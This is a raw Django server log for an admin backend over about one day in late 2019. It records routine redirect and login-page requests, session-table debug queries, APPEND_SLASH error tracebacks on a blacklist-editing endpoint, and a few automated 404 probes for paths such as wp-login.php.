HTTP/1.0" 302 0 [30/Nov/2019 12:11:21] "GET / HTTP/1.0" 302 0 [30/Nov/2019 12:16:32] "GET / HTTP/1.0" 302 0 [30/Nov/2019 12:21:40] "GET / HTTP/1.0" 302 0 [30/Nov/2019 12:26:45] "GET / HTTP/1.0" 302 0 [30/Nov/2019 12:31:53] "GET / HTTP/1.0" 302 0 [30/Nov/2019 12:37:01] "GET / HTTP/1.0" 302 0 [30/Nov/2019 12:42:07] "GET / HTTP/1.0" 302 0 [30/Nov/2019 12:47:14] "GET / HTTP/1.0" 302 0 [30/Nov/2019 12:52:18] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [30/Nov/2019 12:54:59] "POST /editBlackAndWhiteList HTTP/1.0" 500 65634 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [30/Nov/2019 12:55:03] "POST /editBlackAndWhiteList HTTP/1.0" 500 65634 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 70.32.81.181/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [30/Nov/2019 12:55:07] "POST /editBlackAndWhiteList HTTP/1.0" 500 65634 [30/Nov/2019 12:57:27] "GET / HTTP/1.0" 302 0 [30/Nov/2019 13:02:34] "GET / HTTP/1.0" 302 0 [30/Nov/2019 13:07:42] "GET / HTTP/1.0" 302 0 [30/Nov/2019 13:12:44] "GET / HTTP/1.0" 302 0 [30/Nov/2019 13:17:54] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [30/Nov/2019 13:18:23] "GET /proxy.php HTTP/1.0" 404 6411 [30/Nov/2019 13:23:01] "GET / HTTP/1.0" 302 0 [30/Nov/2019 13:28:06] "GET / HTTP/1.0" 302 0 [30/Nov/2019 13:33:10] "GET / HTTP/1.0" 302 0 [30/Nov/2019 13:34:40] "GET / HTTP/1.0" 302 0 [30/Nov/2019 13:38:18] "GET / HTTP/1.0" 302 0 [30/Nov/2019 13:43:25] "GET / HTTP/1.0" 302 0 [30/Nov/2019 13:48:30] "GET / HTTP/1.0" 302 0 [30/Nov/2019 13:53:34] "GET / HTTP/1.0" 302 0 [30/Nov/2019 13:58:41] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:03:50] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:08:55] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:14:00] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:19:08] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:24:13] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:29:21] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:34:26] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:39:35] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:39:45] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:44:41] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:49:47] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:51:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-30 14:51:41,573 utils 26999 140702511523584 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ozeb1jmx6tdb7gxtpea461y49k40yh69' LIMIT 1; args=('ozeb1jmx6tdb7gxtpea461y49k40yh69',) DEBUG 2019-11-30 14:51:41,574 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ozeb1jmx6tdb7gxtpea461y49k40yh69', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-14T14:51:41.573660+00:00'::timestamptz); args=('ozeb1jmx6tdb7gxtpea461y49k40yh69', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 14, 14, 51, 41, 573660, tzinfo=)) [30/Nov/2019 14:51:41] "GET /login/?next=/ HTTP/1.0" 200 1786 [30/Nov/2019 14:54:55] "GET / HTTP/1.0" 302 0 [30/Nov/2019 14:59:55] "GET / HTTP/1.0" 302 0 [30/Nov/2019 15:05:05] "GET / HTTP/1.0" 302 0 [30/Nov/2019 15:10:13] "GET / HTTP/1.0" 302 0 [30/Nov/2019 15:15:16] "GET / HTTP/1.0" 302 0 [30/Nov/2019 15:20:25] "GET / HTTP/1.0" 302 0 [30/Nov/2019 15:25:31] "GET / HTTP/1.0" 302 0 [30/Nov/2019 15:30:36] "GET / HTTP/1.0" 302 0 [30/Nov/2019 15:35:42] "GET / HTTP/1.0" 302 0 [30/Nov/2019 15:40:48] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [30/Nov/2019 15:43:40] "GET /robots.txt HTTP/1.0" 404 6406 [30/Nov/2019 15:45:49] "GET / HTTP/1.0" 302 0 [30/Nov/2019 15:51:00] "GET / HTTP/1.0" 302 0 [30/Nov/2019 15:56:03] "GET / HTTP/1.0" 302 0 [30/Nov/2019 16:01:12] "GET / HTTP/1.0" 302 0 [30/Nov/2019 16:06:19] "GET / HTTP/1.0" 302 0 [30/Nov/2019 16:11:24] "GET / HTTP/1.0" 302 0 [30/Nov/2019 16:14:07] "GET / HTTP/1.0" 302 0 [30/Nov/2019 16:16:29] "GET / HTTP/1.0" 302 0 [30/Nov/2019 16:21:39] "GET / HTTP/1.0" 302 0 [30/Nov/2019 16:26:47] "GET / HTTP/1.0" 302 0 [30/Nov/2019 16:31:53] "GET / HTTP/1.0" 302 0 [30/Nov/2019 16:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [30/Nov/2019 16:36:55] "GET / HTTP/1.0" 302 0 [30/Nov/2019 16:42:09] "GET / HTTP/1.0" 302 0 [30/Nov/2019 16:47:12] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [30/Nov/2019 16:49:24] "GET /proxy.php HTTP/1.0" 404 6411 [30/Nov/2019 16:52:19] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [30/Nov/2019 16:52:25] "GET /proxy.php HTTP/1.0" 404 6407 [30/Nov/2019 16:56:15] "GET / HTTP/1.0" 302 0 [30/Nov/2019 16:57:25] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:02:33] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:07:40] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:12:46] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:17:52] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:22:57] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:28:00] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:33:08] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:37:14] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:38:13] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:43:19] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:48:23] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:53:31] "GET / HTTP/1.0" 302 0 [30/Nov/2019 17:58:34] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:03:35] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:08:48] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:11:11] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:13:54] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:19:00] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:24:06] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:29:12] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:34:16] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:35:01] "GET /whm-server-status HTTP/1.0" 301 0 [30/Nov/2019 18:39:23] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:44:27] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:49:28] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:54:39] "GET / HTTP/1.0" 302 0 [30/Nov/2019 18:59:43] "GET / HTTP/1.0" 302 0 [30/Nov/2019 19:04:50] "GET / HTTP/1.0" 302 0 [30/Nov/2019 19:09:54] "GET / HTTP/1.0" 302 0 [30/Nov/2019 19:15:01] "GET / HTTP/1.0" 302 0 [30/Nov/2019 19:20:08] "GET / HTTP/1.0" 302 0 [30/Nov/2019 19:25:13] "GET / HTTP/1.0" 302 0 [30/Nov/2019 19:30:19] "GET / HTTP/1.0" 302 0 [30/Nov/2019 19:35:21] "GET / HTTP/1.0" 302 0 [30/Nov/2019 19:40:28] "GET / HTTP/1.0" 302 0 [30/Nov/2019 19:45:36] "GET / HTTP/1.0" 302 0 [30/Nov/2019 19:50:40] "GET / HTTP/1.0" 302 0 [30/Nov/2019 19:55:46] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:00:53] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:05:56] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:13:00] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:14:01] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:18:03] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:23:24] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:28:29] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:33:32] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:38:39] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:40:33] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-30 20:40:34,000 utils 26999 140702511523584 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3inbmcd8xqer0yx98w1t50hd5jqgs566' LIMIT 1; args=('3inbmcd8xqer0yx98w1t50hd5jqgs566',) DEBUG 2019-11-30 20:40:34,003 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3inbmcd8xqer0yx98w1t50hd5jqgs566', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-14T20:40:34.001478+00:00'::timestamptz); args=('3inbmcd8xqer0yx98w1t50hd5jqgs566', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 14, 20, 40, 34, 1478, tzinfo=)) [30/Nov/2019 20:40:34] "GET /login/?next=/ HTTP/1.0" 200 1786 [30/Nov/2019 20:43:52] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:49:00] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:51:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-30 20:51:40,777 utils 26999 140702511523584 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'kta8yiq5z4zuxpp55jjvydf96hecne29' LIMIT 1; args=('kta8yiq5z4zuxpp55jjvydf96hecne29',) DEBUG 2019-11-30 20:51:40,779 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('kta8yiq5z4zuxpp55jjvydf96hecne29', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-14T20:51:40.778476+00:00'::timestamptz); args=('kta8yiq5z4zuxpp55jjvydf96hecne29', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 14, 20, 51, 40, 778476, tzinfo=)) [30/Nov/2019 20:51:40] "GET /login/?next=/ HTTP/1.0" 200 1786 [30/Nov/2019 20:54:04] "GET / HTTP/1.0" 302 0 [30/Nov/2019 20:59:08] "GET / HTTP/1.0" 302 0 [30/Nov/2019 21:04:12] "GET / HTTP/1.0" 302 0 [30/Nov/2019 21:09:15] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [30/Nov/2019 21:09:24] "GET /wp-login.php HTTP/1.0" 404 6411 [30/Nov/2019 21:14:20] "GET / HTTP/1.0" 302 0 [30/Nov/2019 21:19:24] "GET / HTTP/1.0" 302 0 [30/Nov/2019 21:24:26] "GET / HTTP/1.0" 302 0 [30/Nov/2019 21:29:32] "GET / HTTP/1.0" 302 0 [30/Nov/2019 21:34:38] "GET / HTTP/1.0" 302 0 [30/Nov/2019 21:38:47] "GET / HTTP/1.0" 302 0 [30/Nov/2019 21:39:44] "GET / HTTP/1.0" 302 0 [30/Nov/2019 21:44:47] "GET / HTTP/1.0" 302 0 [30/Nov/2019 21:49:51] "GET / HTTP/1.0" 302 0 [30/Nov/2019 21:54:57] "GET / HTTP/1.0" 302 0 [30/Nov/2019 22:00:01] "GET / HTTP/1.0" 302 0 [30/Nov/2019 22:05:08] "GET / HTTP/1.0" 302 0 [30/Nov/2019 22:10:14] "GET / HTTP/1.0" 302 0 [30/Nov/2019 22:15:19] "GET / HTTP/1.0" 302 0 [30/Nov/2019 22:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [30/Nov/2019 22:20:26] "GET / HTTP/1.0" 302 0 [30/Nov/2019 22:25:30] "GET / HTTP/1.0" 302 0 [30/Nov/2019 22:30:38] "GET / HTTP/1.0" 302 0 [30/Nov/2019 22:35:43] "GET / HTTP/1.0" 302 0 [30/Nov/2019 22:40:46] "GET / HTTP/1.0" 302 0 [30/Nov/2019 22:45:54] "GET / HTTP/1.0" 302 0 [30/Nov/2019 22:51:00] "GET / HTTP/1.0" 302 0 [30/Nov/2019 22:56:05] "GET / HTTP/1.0" 302 0 [30/Nov/2019 23:05:03] "GET / HTTP/1.0" 302 0 [30/Nov/2019 23:10:47] "GET / HTTP/1.0" 302 0 [30/Nov/2019 23:15:50] "GET / HTTP/1.0" 302 0 [30/Nov/2019 23:20:55] "GET / HTTP/1.0" 302 0 [30/Nov/2019 23:25:57] "GET / HTTP/1.0" 302 0 [30/Nov/2019 23:31:00] "GET / HTTP/1.0" 302 0 [30/Nov/2019 23:36:04] "GET / HTTP/1.0" 302 0 [30/Nov/2019 23:41:06] "GET / HTTP/1.0" 302 0 [30/Nov/2019 23:46:10] "GET / HTTP/1.0" 302 0 [30/Nov/2019 23:46:15] "GET / HTTP/1.0" 302 0 [30/Nov/2019 23:47:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-30 23:47:42,577 utils 26999 140702511523584 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'g9d2bkplleallnyavv680z7yivqodxah' LIMIT 1; args=('g9d2bkplleallnyavv680z7yivqodxah',) DEBUG 2019-11-30 23:47:42,580 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('g9d2bkplleallnyavv680z7yivqodxah', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-14T23:47:42.578403+00:00'::timestamptz); args=('g9d2bkplleallnyavv680z7yivqodxah', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 14, 23, 47, 42, 578403, tzinfo=)) [30/Nov/2019 23:47:42] "GET /login/?next=/ HTTP/1.0" 200 1786 [30/Nov/2019 23:51:21] "GET / HTTP/1.0" 302 0 [30/Nov/2019 23:51:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-30 23:51:40,806 utils 26999 140702511523584 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'yly7yrmzqhgl4gf6wis68ddqzqeycuyx' LIMIT 1; args=('yly7yrmzqhgl4gf6wis68ddqzqeycuyx',) DEBUG 2019-11-30 23:51:40,809 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yly7yrmzqhgl4gf6wis68ddqzqeycuyx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-14T23:51:40.807304+00:00'::timestamptz); args=('yly7yrmzqhgl4gf6wis68ddqzqeycuyx', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 14, 23, 51, 40, 807304, tzinfo=)) [30/Nov/2019 23:51:40] "GET /login/?next=/ HTTP/1.0" 200 1786 [30/Nov/2019 23:56:27] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:01:32] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:06:39] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:11:42] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:16:54] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:21:56] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:24:46] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:27:11] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:32:14] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:37:18] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:42:31] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:47:49] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:52:59] "GET / HTTP/1.0" 302 0 [01/Dec/2019 00:57:58] "HEAD / HTTP/1.0" 302 0 [01/Dec/2019 00:58:16] "GET / HTTP/1.0" 302 0 [01/Dec/2019 01:03:26] "GET / HTTP/1.0" 302 0 [01/Dec/2019 01:08:45] "GET / HTTP/1.0" 302 0 [01/Dec/2019 01:13:57] "GET / HTTP/1.0" 302 0 [01/Dec/2019 01:19:14] "GET / HTTP/1.0" 302 0 [01/Dec/2019 01:24:31] "GET / HTTP/1.0" 302 0 [01/Dec/2019 01:29:45] "GET / HTTP/1.0" 302 0 [01/Dec/2019 01:34:57] "GET / HTTP/1.0" 302 0 [01/Dec/2019 01:40:06] "GET / HTTP/1.0" 302 0 [01/Dec/2019 01:45:13] "GET / HTTP/1.0" 302 0 [01/Dec/2019 01:50:18] "GET / HTTP/1.0" 302 0 [01/Dec/2019 01:55:29] "GET / HTTP/1.0" 302 0 [01/Dec/2019 02:00:40] "GET / HTTP/1.0" 302 0 Not Found: /wp-login.php [01/Dec/2019 02:03:46] "GET /wp-login.php HTTP/1.0" 404 6415 [01/Dec/2019 02:05:54] "GET / HTTP/1.0" 302 0 [01/Dec/2019 02:11:04] "GET / HTTP/1.0" 302 0 [01/Dec/2019 02:16:16] "GET / HTTP/1.0" 302 0 [01/Dec/2019 02:21:22] "GET / HTTP/1.0" 302 0 [01/Dec/2019 02:26:23] "GET / HTTP/1.0" 302 0 [01/Dec/2019 02:31:31] "GET / HTTP/1.0" 302 0 [01/Dec/2019 02:36:35] "GET / HTTP/1.0" 302 0 [01/Dec/2019 02:41:37] "GET / HTTP/1.0" 302 0 [01/Dec/2019 02:46:47] "GET / HTTP/1.0" 302 0 [01/Dec/2019 02:51:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-01 02:51:40,820 utils 26999 140702511523584 (0.012) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ksrmebcaij0p2rcpu1kah0tmv298f8uu' LIMIT 1; args=('ksrmebcaij0p2rcpu1kah0tmv298f8uu',) DEBUG 2019-12-01 02:51:40,823 utils 26999 140702511523584 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ksrmebcaij0p2rcpu1kah0tmv298f8uu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-15T02:51:40.820592+00:00'::timestamptz); args=('ksrmebcaij0p2rcpu1kah0tmv298f8uu', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 15, 2, 51, 40, 820592, tzinfo=)) [01/Dec/2019 02:51:40] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Dec/2019 02:51:46] "GET / HTTP/1.0" 302 0 [01/Dec/2019 02:56:50] "GET / HTTP/1.0" 302 0 [01/Dec/2019 03:01:56] "GET / HTTP/1.0" 302 0 [01/Dec/2019 03:06:58] "GET / HTTP/1.0" 302 0 [01/Dec/2019 03:12:07] "GET / HTTP/1.0" 302 0 [01/Dec/2019 03:13:00] "GET / HTTP/1.0" 302 0 [01/Dec/2019 03:17:09] "GET / HTTP/1.0" 302 0 [01/Dec/2019 03:18:13] "HEAD / HTTP/1.0" 302 0 [01/Dec/2019 03:22:18] "GET / HTTP/1.0" 302 0 [01/Dec/2019 03:27:25] "GET / HTTP/1.0" 302 0 [01/Dec/2019 03:32:29] "GET / HTTP/1.0" 302 0 [01/Dec/2019 03:37:34] "GET / HTTP/1.0" 302 0 [01/Dec/2019 03:42:39] "GET / HTTP/1.0" 302 0 [01/Dec/2019 03:47:42] "GET / HTTP/1.0" 302 0 Not Found: /favicon.ico [01/Dec/2019 03:49:18] "GET /favicon.ico HTTP/1.0" 404 6409 [01/Dec/2019 03:50:02] "GET /whm-server-status HTTP/1.0" 301 0 [01/Dec/2019 03:52:49] "GET / HTTP/1.0" 302 0 [01/Dec/2019 03:57:55] "GET / HTTP/1.0" 302 0 [01/Dec/2019 04:02:58] "GET / HTTP/1.0" 302 0 [01/Dec/2019 04:08:06] "GET / HTTP/1.0" 302 0 [01/Dec/2019 04:13:09] "GET / HTTP/1.0" 302 0 [01/Dec/2019 04:18:13] "GET / HTTP/1.0" 302 0 [01/Dec/2019 04:23:21] "GET / HTTP/1.0" 302 0 [01/Dec/2019 04:28:26] "GET / HTTP/1.0" 302 0 [01/Dec/2019 04:33:28] "GET / HTTP/1.0" 302 0 [01/Dec/2019 04:36:20] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-01 04:36:20,886 utils 26999 140702511523584 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '58i28dd7lufv0v2wgyumlrf4z54bknrz' LIMIT 1; args=('58i28dd7lufv0v2wgyumlrf4z54bknrz',) DEBUG 2019-12-01 04:36:20,887 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('58i28dd7lufv0v2wgyumlrf4z54bknrz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-15T04:36:20.886703+00:00'::timestamptz); args=('58i28dd7lufv0v2wgyumlrf4z54bknrz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 15, 4, 36, 20, 886703, tzinfo=)) [01/Dec/2019 04:36:20] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Dec/2019 04:38:37] "GET / HTTP/1.0" 302 0 [01/Dec/2019 04:43:43] "GET / HTTP/1.0" 302 0 [01/Dec/2019 04:48:47] "GET / HTTP/1.0" 302 0 [01/Dec/2019 04:53:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-01 04:53:03,871 utils 26999 140702511523584 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '3wvyq8sfu6pkiblbleh3mfik460gszl0' LIMIT 1; args=('3wvyq8sfu6pkiblbleh3mfik460gszl0',) DEBUG 2019-12-01 04:53:03,873 utils 26999 140702511523584 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('3wvyq8sfu6pkiblbleh3mfik460gszl0', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-15T04:53:03.871971+00:00'::timestamptz); args=('3wvyq8sfu6pkiblbleh3mfik460gszl0', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 15, 4, 53, 3, 871971, tzinfo=)) [01/Dec/2019 04:53:03] "GET /login/?next=/ HTTP/1.0" 200 1786 [01/Dec/2019 04:53:55] "GET / HTTP/1.0" 302 0 [01/Dec/2019 04:59:01] "GET / HTTP/1.0" 302 0 [01/Dec/2019 05:04:06] "GET / HTTP/1.0" 302 0 [01/Dec/2019 05:08:01] "GET / HTTP/1.0" 302 0 [01/Dec/2019 05:09:10] "GET / HTTP/1.0" 302 0 [01/Dec/2019 05:14:17] "GET / HTTP/1.0" 302 0 [01/Dec/2019 05:19:21] "GET / HTTP/1.0" 302 0 [01/Dec/2019 05:24:29] "GET / HTTP/1.0" 302 0 [01/Dec/2019 05:29:37] "GET / HTTP/1.0" 302 0 [01/Dec/2019 05:34:41] "GET / HTTP/1.0" 302 0 [01/Dec/2019 05:39:47] "GET / HTTP/1.0" 302 0 [01/Dec/2019 05:44:51] "GET / HTTP/1.0" 302 0 [01/Dec/2019 05:49:58] "GET / HTTP/1.0" 302 0 [01/Dec/2019 05:55:05] "GET / HTTP/1.0" 302 0 [01/Dec/2019 06:00:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Dec/2019 06:00:10] "GET / HTTP/1.0" 302 0 [01/Dec/2019 06:05:12] "GET / HTTP/1.0" 302 0 [01/Dec/2019 06:10:22] "GET / HTTP/1.0" 302 0 [01/Dec/2019 06:15:27] "GET / HTTP/1.0" 302 0 [01/Dec/2019 06:20:33] "GET / HTTP/1.0" 302 0 [01/Dec/2019 06:25:37] "GET / HTTP/1.0" 302 0 [01/Dec/2019 06:30:44] "GET / HTTP/1.0" 302 0 [01/Dec/2019 06:35:50] "GET / HTTP/1.0" 302 0 [01/Dec/2019 06:40:55] "GET / HTTP/1.0" 302 0 [01/Dec/2019 06:45:56] "GET / HTTP/1.0" 302 0 [01/Dec/2019 06:50:01] "GET /whm-server-status HTTP/1.0" 301 0 [01/Dec/2019 06:51:06] "GET / HTTP/1.0" 302 0 [01/Dec/2019 06:56:14] "GET / HTTP/1.0" 302 0 [01/Dec/2019 07:01:21] "GET / HTTP/1.0" 302 0 [01/Dec/2019 07:06:27] "GET / HTTP/1.0" 302 0 [01/Dec/2019 07:11:34] "GET / HTTP/1.0" 302 0 [01/Dec/2019 07:16:40] "GET / HTTP/1.0" 302 0 [01/Dec/2019 07:21:43] "GET / HTTP/1.0" 302 0 [01/Dec/2019 07:26:54] "GET / HTTP/1.0" 302 0 [01/Dec/2019 07:32:00] "GET / HTTP/1.0" 302 0 [01/Dec/2019 07:37:01] "GET / HTTP/1.0" 302 0 [01/Dec/2019 07:40:01] "GET /whm-server-status HTTP/1.0" 301 0 Not Found: /.well-known/pki-validation/39410842191FD82A62AEC50826CC93EB.txt [01/Dec/2019 07:40:03] "GET /.well-known/pki-validation/39410842191FD82A62AEC50826CC93EB.txt 